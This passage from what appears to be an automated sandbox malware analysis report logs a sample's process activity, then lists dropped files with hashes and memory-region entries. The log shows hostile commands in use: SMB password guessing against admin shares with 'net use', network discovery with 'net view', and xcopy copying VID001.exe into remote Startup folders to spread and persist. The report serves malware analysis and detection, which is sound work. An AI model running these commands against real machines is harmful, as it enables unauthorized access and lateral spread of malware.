            net use \\10.10.0.89\Users "123" /user:"admin"
        [5] C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            - Runs ping.exe
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\C$ "0" /user:"àäìèíèñòðàòîð"
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\Users "0" /user:"àäìèíèñòðàòîð"
        [5] C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            - Runs ping.exe
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\C$ """" /user:"àäìèíèñòðàòîð"
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\Users """" /user:"àäìèíèñòðàòîð"
        [5] C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            - Runs ping.exe
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\C$ "àäìèíèñòðàòîð" /user:"àäìèíèñòðàòîð"
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\Users "àäìèíèñòðàòîð" /user:"àäìèíèñòðàòîð"
        [5] C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            - Runs ping.exe
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\C$ "1" /user:"àäìèíèñòðàòîð"
-
C:\Windows\SysWOW64\net.exenet use \\10.10.0.89\Users "1" /user:"àäìèíèñòðàòîð"5⤵
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost5⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\net.exenet use \\10.10.0.89\C$ "123" /user:"àäìèíèñòðàòîð"5⤵
-
C:\Windows\SysWOW64\net.exenet use \\10.10.0.89\Users "123" /user:"àäìèíèñòðàòîð"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c net view \\10.10.0.79|find /i " "5⤵
-
C:\Windows\SysWOW64\net.exenet view \\10.10.0.796⤵
- Discovers systems in the same network
-
C:\Windows\SysWOW64\find.exefind /i " "6⤵
-
C:\Windows\SysWOW64\net.exenet use * /delete /y5⤵
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost5⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"5⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.10.0.79\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"5⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.10.0.79\C$\Documents and Settings\1\Start Menu\Programs\Startup\VID001.exe"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"5⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.10.0.79\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"5⤵
-
C:\Windows\SysWOW64\net.exenet use \\10.10.0.79\C$ /delete /y5⤵
-
C:\Windows\SysWOW64\PING.EXEping -n 20 localhost5⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.10.0.79\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"5⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.10.0.79\Users\Documents and Settings\1\Start Menu\Programs\Startup\VID001.exe"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"5⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.10.0.79\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"5⤵
-
C:\Windows\SysWOW64\net.exenet use \\10.10.0.79\Users /delete /y5⤵
-
C:\Windows\SysWOW64\PING.EXEping -n 20 localhost5⤵
- Runs ping.exe
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵
-
C:\Windows\system32\fontdrvhost.exe"fontdrvhost.exe"1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\0F745672_Rar\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
MD5 2915b3f8b703eb744fc54c81f4a9c67f
SHA1 e10361a11f8a7f232ac3cb2125c1875a0a69a3e4
SHA256 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
SHA512 84e53163c255edde6a0f2289b67166ad8c4f3e2b06e92b7d9dd3d8701a58b4c6f6c661be0c9f0777677bcd36de0a7cccc6512d953c4ba12d8b5c6a35617f3816
-
C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe
MD5 921379bd587ab29da4dc23fb9d47fe36
SHA1 e9db1731731503a81a2fdc67ffa005e6aa2a8038
SHA256 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6
SHA512 90211127d4dd83619bf42a1ab1f5d78d1a9f8ab7767704b19432d681807b636cf2bfbeb5ae97e25b57071e2a04f3b13e5a3f28b69d392b94f7ac0b3015ff38fc
-
C:\Users\Admin\AppData\Roaming\TempoRX\uihost64.exe
MD5 0211073feb4ba88254f40a2e6611fcef
SHA1 3ce5aeeac3a1586d291552f541b5e6508f8b7cea
SHA256 62dfe27768e6293eb9218ba22a3acb528df71e4cc4625b95726cd421b716f983
SHA512 6ce06a15c5aa0fd78e01e5a2ef0507c1eba8bfe61ca5fc8d20526cb26f029f730f0ea1c34ce56c3f5db43aff1c2b05aa548b9514b17001c61d2a46660ee11fe7
-
C:\Windows\SYSTEM.INI
MD5 4549341be22c2d105740997e133ef1e5
SHA1 a1779873160897f8e67ddd7478041e5e90ec4b2b
SHA256 f6751106914f745a2956b74686a522382a554f43720f2e47de59d1fe3bc45243
SHA512 64756bbbb4fe2bb277f2340d658186d67f6e0a42420ce55fa431e3e221c466f73b41a9d7744cb5d3f2ffc42337777214b095f33b16018c11319b239bf5608189
-
\Users\Admin\AppData\Local\Temp\nsf6160.tmp\inetc.dll
MD5 d7a3fa6a6c738b4a3c40d5602af20b08
SHA1 34fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA256 67eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA512 75cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934
-
memory/412-62-0x0000000000000000-mapping.dmp
-
memory/412-64-0x0000000000640000-0x0000000000641000-memory.dmp  Filesize 4KB
-
memory/496-34-0x0000000000000000-mapping.dmp
-
memory/496-46-0x00000000005F0000-0x00000000005F1000-memory.dmp  Filesize 4KB
-
memory/592-144-0x0000000000000000-mapping.dmp
-
memory/592-146-0x0000000000690000-0x0000000000691000-memory.dmp  Filesize 4KB
-
memory/876-16-0x0000000000000000-mapping.dmp
-
memory/876-19-0x0000000000910000-0x0000000000911000-memory.dmp  Filesize 4KB
-
memory/904-126-0x0000000000000000-mapping.dmp
-
memory/1108-2-0x0000000002360000-0x00000000033EE000-memory.dmp  Filesize 16.6MB
-
memory/1108-4-0x0000000002230000-0x0000000002231000-memory.dmp  Filesize 4KB
-
memory/1108-3-0x0000000002220000-0x0000000002222000-memory.dmp  Filesize 8KB
-
memory/1124-149-0x0000000000000000-mapping.dmp
-
memory/1172-137-0x0000000000000000-mapping.dmp
-
memory/1232-36-0x0000000000000000-mapping.dmp
-
memory/1236-103-0x00000000008D0000-0x00000000008D1000-memory.dmp  Filesize 4KB
-
memory/1236-101-0x0000000000000000-mapping.dmp
-
memory/1256-209-0x00000000001F0000-0x00000000001F1000-memory.dmp  Filesize 4KB
-
memory/1308-163-0x0000000000000000-mapping.dmp
-
memory/1308-165-0x0000000001250000-0x0000000001251000-memory.dmp  Filesize 4KB
-
memory/1316-138-0x0000000000000000-mapping.dmp
-
memory/1328-77-0x0000000000CE0000-0x0000000000CE1000-memory.dmp  Filesize 4KB
-
memory/1328-75-0x0000000000000000-mapping.dmp
-
memory/1348-98-0x0000000000FF0000-0x0000000000FF1000-memory.dmp  Filesize 4KB
-
memory/1348-96-0x0000000000000000-mapping.dmp
-
memory/1412-155-0x0000000000000000-mapping.dmp
-
memory/1476-124-0x0000000000000000-mapping.dmp
-
memory/1480-37-0x0000000000000000-mapping.dmp
-
memory/1556-50-0x0000000000950000-0x0000000000951000-memory.dmp  Filesize 4KB
-
memory/1556-43-0x0000000000000000-mapping.dmp
-
memory/1644-156-0x0000000000000000-mapping.dmp
-
memory/1792-157-0x0000000000000000-mapping.dmp
-
memory/1832-150-0x0000000000000000-mapping.dmp
-
memory/1832-152-0x00000000005E0000-0x00000000005E1000-memory.dmp  Filesize 4KB
-
memory/1880-113-0x0000000000000000-mapping.dmp
-
memory/1892-189-0x00000000029F0000-0x00000000029F1000-memory.dmp  Filesize 4KB
-
memory/1940-21-0x0000000000380000-0x0000000000381000-memory.dmp  Filesize 4KB
-
memory/1940-17-0x0000000000000000-mapping.dmp
-
memory/2072-181-0x0000000000DA0000-0x0000000000DA1000-memory.dmp  Filesize 4KB
-
memory/2088-169-0x00000000026D0000-0x00000000026D1000-memory.dmp  Filesize 4KB
-
memory/2096-88-0x0000000000000000-mapping.dmp
-
memory/2160-28-0x0000000000000000-mapping.dmp
-
memory/2236-40-0x0000000000000000-mapping.dmp
-
memory/2304-72-0x0000000000000000-mapping.dmp
-
memory/2320-86-0x0000000000000000-mapping.dmp
-
memory/2448-70-0x0000000000000000-mapping.dmp
-
memory/2488-80-0x0000000000000000-mapping.dmp
-
memory/2544-112-0x0000000000000000-mapping.dmp
-
memory/2596-106-0x0000000000000000-mapping.dmp
-
memory/2604-41-0x0000000000000000-mapping.dmp
-
memory/2604-48-0x0000000000BA0000-0x0000000000BA1000-memory.dmp  Filesize 4KB
-
memory/2652-68-0x0000000000000000-mapping.dmp
-
memory/2692-185-0x0000000001060000-0x0000000001061000-memory.dmp  Filesize 4KB
-
memory/2744-159-0x0000000000000000-mapping.dmp
-
memory/2756-14-0x00000000022C0000-0x00000000022C1000-memory.dmp  Filesize 4KB
-
memory/2756-5-0x0000000000000000-mapping.dmp
-
memory/2756-9-0x00000000022E0000-0x000000000336E000-memory.dmp  Filesize 16.6MB
-
memory/2796-158-0x0000000000000000-mapping.dmp
-
memory/2828-177-0x0000000000540000-0x0000000000541000-memory.dmp  Filesize 4KB
-
memory/2916-87-0x0000000000000000-mapping.dmp
-
memory/2960-205-0x0000000000E10000-0x0000000000E11000-memory.dmp  Filesize 4KB
-
memory/2992-193-0x0000000003340000-0x0000000003341000-memory.dmp  Filesize 4KB
-
memory/3024-23-0x0000000000000000-mapping.dmp
-
memory/3100-33-0x0000000000180000-0x0000000000190000-memory.dmp  Filesize 64KB
-
memory/3100-42-0x00000000001B0000-0x00000000001C0000-memory.dmp  Filesize 64KB
-
memory/3100-65-0x00000000001F0000-0x0000000000200000-memory.dmp  Filesize 64KB
-
memory/3100-30-0x0000000000000000-mapping.dmp
-
memory/3100-32-0x0000000000400000-0x00000000009E7000-memory.dmp  Filesize 5.9MB
-
memory/3120-125-0x0000000000000000-mapping.dmp
-
memory/3212-89-0x0000000000000000-mapping.dmp
-
memory/3232-107-0x0000000000000000-mapping.dmp
-
memory/3232-109-0x0000000000990000-0x0000000000991000-memory.dmp  Filesize 4KB
-
memory/3252-161-0x0000000000000000-mapping.dmp
-
memory/3268-197-0x0000000000EF0000-0x0000000000EF1000-memory.dmp  Filesize 4KB
-
memory/3356-116-0x00000000010F0000-0x00000000010F1000-memory.dmp  Filesize 4KB
-
memory/3356-114-0x0000000000000000-mapping.dmp
-
memory/3364-139-0x0000000000000000-mapping.dmp
-
memory/3364-141-0x0000000002850000-0x0000000002851000-memory.dmp  Filesize 4KB
-
memory/3412-129-0x0000000000F00000-0x0000000000F01000-memory.dmp  Filesize 4KB
-
memory/3412-127-0x0000000000000000-mapping.dmp
-
memory/3448-61-0x0000000000000000-mapping.dmp
-
memory/3520-29-0x0000000000000000-mapping.dmp
-
memory/3524-71-0x0000000000000000-mapping.dmp
-
memory/3636-35-0x0000000000000000-mapping.dmp
-
memory/3708-195-0x00000000025F0000-0x00000000025F1000-memory.dmp  Filesize 4KB
-
memory/3776-134-0x0000000003530000-0x0000000003531000-memory.dmp  Filesize 4KB
-
memory/3776-132-0x0000000000000000-mapping.dmp
-
memory/3796-69-0x0000000000000000-mapping.dmp
-
memory/3812-173-0x00000000007B0000-0x00000000007B1000-memory.dmp  Filesize 4KB
-
memory/3820-38-0x0000000000000000-mapping.dmp
-
memory/3900-93-0x00000000005E0000-0x00000000005E1000-memory.dmp  Filesize 4KB
-
memory/3900-91-0x0000000000000000-mapping.dmp
-
memory/3908-73-0x0000000000000000-mapping.dmp
-
memory/3928-119-0x0000000000000000-mapping.dmp
-
memory/3928-121-0x00000000007B0000-0x00000000007B1000-memory.dmp  Filesize 4KB
-
memory/3956-162-0x0000000000000000-mapping.dmp
-
memory/3988-83-0x0000000000B60000-0x0000000000B61000-memory.dmp  Filesize 4KB
-
memory/3988-81-0x0000000000000000-mapping.dmp
-
memory/4000-74-0x0000000000000000-mapping.dmp
-
memory/4004-22-0x0000000000000000-mapping.dmp
-
memory/4016-90-0x0000000000000000-mapping.dmp
-
memory/4036-39-0x0000000000000000-mapping.dmp
-
memory/4040-44-0x0000000000000000-mapping.dmp
-
memory/4040-52-0x0000000003160000-0x0000000003161000-memory.dmp  Filesize 4KB
-
memory/4044-160-0x0000000000000000-mapping.dmp